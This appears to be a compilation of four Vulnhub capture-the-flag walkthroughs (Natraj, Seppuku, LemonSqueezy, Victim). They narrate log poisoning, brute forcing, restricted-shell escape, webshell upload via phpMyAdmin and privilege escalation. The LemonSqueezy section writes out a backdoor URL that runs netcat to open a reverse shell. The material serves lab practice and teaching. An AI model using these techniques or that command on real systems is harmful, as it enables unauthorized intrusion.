HA: Natraj Vulnhub Walkthrough

Today we’re going to solve another boot2root challenge called “Natraj”. It’s available at Vulnhub for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to Hacking Articles. Let’s get started and learn how to break it down successfully.

Level: Not defined

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirb
  • LinEnum

Exploitation

  • RCE with LFI and SSH Log Poisoning

Privilege Escalation

  • Abuse of Apache configuration file permissions
  • Abusing SUDO
  • Capture the flag

Walkthrough

Reconnaissance

Like always we will identify the host’s IP with the “Netdiscover” tool.

So, let’s start by listing all the TCP ports with nmap.

Enumeration

We started by visiting the web service (port 80), where we have found several pictures and information about the Natraj, we will check the source code and robots.txt, it seems that there is nothing useful. (or at least, for the moment). So let’s proceed further.

With the help of Dirb and it’s default dictionary, we have found a directory called “console“.

We go in and list a file called “file.php“:

If we execute it, we see that it does nothing. We probably need to add something else 😉

Now I decided to use the same file name as the “GET” variable and try to do a proof of concept (POC) to check if the site was vulnerable to Local File Inclusion (LFI).

Exploiting

After examining I found that it was vulnerable and that the site was using an Apache server, I tried to perform an RCE (Remote Command Execution) by poisoning the Apache log, but I was not successful.

After further testing of other options, I saw that I do have the Access to the “auth.log” file, where SSH service logs appear.

Malicious sending:

Response from the server:

After this, we can try writing PHP code inside the SSH command for the connection:

We make another request, this time we indicate in the variable a “id” and check that it is indeed vulnerable.

Great! now, we’ll put a listening netcat on port 1234 and run the command to get the reverse Shell.

We will pass this line to URL-Encode:

And we will send the request as shows in image below:

If everything went well, we will have a reverse shell with the user “www-data”:

We execute the following commands to get an interactive shell.

We use the tool “LinEnum” and see that we have to write permissions in the file “/etc/apache2/apache2.conf”.

Privilege Escalation (user)

I downloaded the file in my machine and edited these lines, specifying the username “mahakal”.

We set up an HTTP server with Python, Download the file to the machine and replace the original.

Now, we’ll have to create a reverse Shell in PHP so that when we will run it, we take control of it as the user “mahakal”.

This web Shell will be hosted in the directory “/var/www/html“.

Now we’ll put a Netcat to listen on port 5555.

We’ll reboot the machine and run the “shell.php” file:

We go back to our shell with Netcat and check that we are already inside the machine with the user account “mahakal”.

Privilege Escalation (root)

We do a “sudo -l” and see that we have permission to run the nmap binary as root and without a password.

We return to execute the necessary commands to get an interactive shell.

The idea is to raise a shell as root, for this we will put the command in a variable and then we will call it with nmap emulating a script, we can do it in the following way.

And having already hijacked the root account, we only have to read the flag and complete this great machine.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contact on LinkedIn.

Seppuku:1 Vulnhub Walkthrough

Today we are going to crack this machine called “Seppuku:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. It was an intermediate box which made me learn many new things. This credit of making this lab goes to SunCSR Team. Let’s start and learn how to successfully breach it.

Level:  Intermediate to Hard

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Abusing HTTP Services
  • Dirb

Exploiting

  • Brute forcing using hydra
  • Connecting using SSH
  • Bypassing Restricted shell

Privilege Escalation

  • Abusing Sudo
  • Capture the flag

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.104 as our host IP.

Then we used nmap for port enumeration. We found that port 21 for ftp, port 22 for ssh, port 80 for http, 139 and 445 for NetBIOS-ssn, port 7080 for SSL/http, port 7601 for http, port 8088 for http.

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 7601 is open I look toward browser and explore target ip 192.168.1.104  but unfortunately found nothing useful.

Further, we use dirb for directory brute-forcing and found secret & key with status code 200 OK on executing following command.

When we navigate URL enumerated above, i.e. keys we found some files, here private was useful for us.

This link leads us to a page called private. This is a private key for some user which we have not found yet.

Further, we will explore our next directory called secret which we found in our dirb scan.

AS result it gives some very important files such as password.lst and hostname.

Here found a file named hostname which gave us a username i.e. seppuku.

Exploiting

We have got username seppuku , now our next job is to find the password for the user seppuku with the help of hydra for SSH login brute force. Here the best way to guess password is to use the password file which we found in the secret directory during dirb scan.

From its result, we found the password eeyoree for seppuku.

We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.

 After getting logged in let’s go for further investigation to find some hidden files. As a result, we found a hidden file called .passwd which gave us a password for what we don’t know right now.

After that, we tried to go inside the home directory, but we were not able to do so because of restricted rbash shell. 🤔

Since we know the ssh credentials of the user who is part of rbash shell, then you can use the following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.

Now we will again try to access the home directory this time we were successful in doing so. Now we will again check the hidden files where we found 2 new users named samurai and tanto.

So let’s dive in by getting logged in as samurai with the password we found in .passwd hidden file.

Let us use the sudo -l command to enumerate if this user can run some application with root privileges.

 We found seppuku user can run .cgi_bin/bin command as the samurai user which suppose have the root access.

Privilege Escalation

If you remembered we have enumerated private key when while performing directory brute force, here I copied the content of private file found in key during dirb scan and saved it into an empty file named sshkey with chmod 600 permissions.

Since we port 22 open on the target machine, we will try to connect the target machine using this key for user TANTO and execute the following command.

After login as tanto, we looked for .cgi_bin directory that will be executed through sudo user but unfortunately, I was unable to find this directory, therefore, I made a directory as .cgi_bin and save the bash script in a file named as “bin” to get bash shell through it.

Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag 🚩. 

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact  here

LemonSqueezy:1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “LemonSqueezy:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to James Hay. Let’s start and learn how to successfully breach it.

Level: Easy to Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here

Penetration Testing Methodology

Reconnaissance

Nmap

Enumeration

  • Abusing HTTP Services
  • Web Directory Bruteforce (dirb)
  • Wpscan for Username and Password Enumeration

Exploitation

  • Logging to WordPress
  • Shell Uploading through PhpMyAdmin

Post Enumeration

  • Using LinEnum.sh
  • Creating Netcat Shell using msfvenom

 Privilege Escalation

  • Abusing cronjob for Writable Script
  • Capture the flag

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.105 as our host IP.

Then we used nmap for port enumeration. We found port 80 for http.

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.105 . But it is not much of great help. Moving on.

Further, we use dirb for directory brute-forcing and found phpmyadmin & wordpress page with status code 200 OK on executing following command.

When we searched the above-listed page, i.e. wordpress we found nothing useful.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

I found two user names: orange and lemon.

Now the next job is to hunt for a password for user orange for which we will use rockyou.txt. Time to fire up wpscan with our username & password list to valid user login combination.

We have successfully found the password for orange. Let’s make good use of them.

 Now we mapped the domain name with the target machine’s IP address in the /etc/hosts file.

Further, we login to WordPress using orange credentials. It was holding another clue for us in edit post section we found a password i.e. [email protected]! .

Now our next job is to try to login phpmyadmin page with this password using user orange.

Exploitation

After logging in let’s explore the page further to find some juicy information.

Here we found the database named wordpress.

So, we have login into phpmyadmin, now it was time to exploit phpMyAdmin to get a reverse connection and we have already published a post on “Shell Uploading in Web Server through PhpMyAdmin”. With the help of this post, I try to exploit phpMyAdmin and follow the given steps.

Within the database of WordPress, we created a table as I have given raj and click on create.

Click on raj to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now, the next part is interesting because here I am going to execute malicious code as SQL query which will create a Remote code Execution inside the webserver. In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

Now type the following URL to find whether we are successful or not in order to create RCE vulnerability.

When you execute the above URL in the browser you will get the information of victim ‘s PC.

Now it was time to get netcat reverse connection of the host machine by executing the following URL.

 http://192.168.1.105/wordpress/backdoor.php?cmd=nc  -e /bin/bash 192.168.1.112 1234

Now before executing the backdoor let’s fire up netcat listener in another terminal.

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.

here we found a text file name user.txt as 1st flag. Now let go for Privilege Escalation with the help of Linenum.sh which will help us in post enumeration.

cat user.txt

Post Enumeration

Next, we tried to download linenum.sh in /tmp but we were not able to do so because /tmp was not having the permission to do so. Since /var/www/html/wordpress is writable we will try to download there.

LinEnum.sh is bash script used for enumerating the Linux machine to checks which services are running on the machine, privileges access, version information, system information, user information etc.

  1. Download the script or get the location where this script is stored.
  2. Host the python server and copy the link of the LinEnum.sh file.
  3. Download the script in the remote host using “wget” command in the “/var/www/html/wordpress” directory.
  4. Change the permission of the LinEnum.sh shell script using “chmod” command.
  5. Now run the script in the remote machine.

So here got some information after running the shell script LinEnum.sh

As a result, we found that /etc/logrotate.d/logrotate is writable and also run as cronjob at every 2 minutes after.

Privilege Escalation

In order to compromise the machine and get the root access, we will use msfvenom for our further exploitation.

As we know logrotate is writable and run as a cronjob, therefore, I will overwrite this file with the following command.

On other hand we will fire up netcat listener in another terminal to get a reverse shell and wait for some 2 minutes as soon as the logrotate will execute as cronjob this will give us root privileges shell and finally capture the final flag.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here

Victim:1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “Victim:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to iamv1nc3nt. Let’s start and learn how to successfully breach it.

Level: Easy to Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Wireshark

Exploiting

  • Aircrack-ng
  • SSH login

Privilege Escalation

  • Abusing writeable file
  • Capture the flag

Walkthrough

Reconnaissance

As we always identify host IP using netdiscover command and then continue with network scanning for port enumeration So, let’s start with nmap port enumeration and execute following command in our terminal.

From its result, we found ports 22(SSH) , 80(http), 8080(http), 9000(http) were open.

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.104 and found nothing useful.

Further on enumerating port 8999, the resultant page come up with the WordPress files and here WPA-01.cap file looks interesting; I download it to find out some clue.

 After downloading the cap file, we need to analyze it. So, when we open this file, it was a Wireshark cap file and by streaming the 1st packet we noticed SSID: dlink as shown in the image. This can be probably used as a Password.

Exploiting

Further we used aircrack-ng for cracking the file captured.cap using the following command:

After a few minutes, we have found the key: p4ssword as shown in the image below.

We have a username and a password, so we tried to access the SSH on the target system and were successfully able to log in.

After getting logged in let’s go for post-exploitation and try to escalate root privileged. While doing post enumeration we found writable permission is assigned on /var/www/bolt/public/files.

Since the file directory was owned by root and also allow write permission for everyone thus we download php-reverse-shell from our local machine into host machine using wget command to do so execute the following command:

Further, we will execute our php-reverse-shell in browser but before that fire up netcat in another terminal to get a reverse shell with root privileges and capture the final flag.

2nd method for privilege escalation

As we know nohup is a command which executes another program specified as its argument and ignores all signup (hangup) signals. It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.  nohup Privilege Escalation

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact  here